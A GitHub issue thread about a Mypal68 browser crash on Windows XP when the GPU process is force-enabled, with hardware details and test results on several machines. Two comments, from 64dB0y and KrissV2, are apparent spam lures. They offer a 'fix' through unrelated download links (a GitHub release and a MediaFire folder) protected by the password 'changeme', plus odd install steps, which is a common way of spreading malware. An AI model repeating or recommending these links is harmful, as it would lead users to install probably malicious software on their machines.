### ISSUE TITLE
layers.gpu-process.force-enabled;true => points to memory 0x00000000

### ISSUE THREAD

**Issue by freakedenough** [Feodor2/Mypal68#505]
Enabling **layers.gpu-process.force-enabled** causes this error on startup (displayed twice in a row)
![Unbenannt](https://github.com/user-attachments/assets/1f68acf4-4a19-469f-aacd-749862987c2b)
"The instruction at 0x100332d3 referenced memory at 0x00000000. The required data was not placed into memory because of an I/O error status of 0x75b1b11c."
and Youtube playback aborts after 1 second with an unspecific "an eror occured", I guess the gpu rendering process says goodbye.

ATi Mobility Radeon X600 SE (DX9 card) on XPSP3, Pentium M 740
mypal-68.14.4.en-US.win32-sse.zip

If relevant: media.gpu-process-decoder=true as well. If false, error still present. layers.gpu-process.force-enabled=false and the error is gone, Youtube (and other video streams) will playback again, but everything in software.
Surfing the web does work, I'm currently writing this ticket using MP68.

**Comment by freakedenough** [comment]
THe x600se has no h264 acceleration, ATi only supported it from x1000 and Catalyst 5.13 onwards. Well, I want to have hardware accelerated website rendering but expect software media rendering.

**Comment by 64dB0y** [comment]
to fix your trouble check this fix, i see it in another issue,
https://github.com/Jostino/RimWorld-it/releases/tag/fix
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by freakedenough** [comment]
I copied the installation and profile over to two more PCs:
Vaio PCG-GRT815E with XPSP3 and NVIDIA GeForce FX Go 5600 (DX9 card) => identical error with identical 0x0 numbers
Own desktop build with Vista + Srv08 updates and NVIDIA Geforce GT 330 (DX11 card) => no errors, video playback also works

Thus I assume some XP incompatibility of layers.gpu-process.force-enabled.

**Comment by KrissV2** [comment]
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx

**Comment by Feodor2** [comment]
Certainly
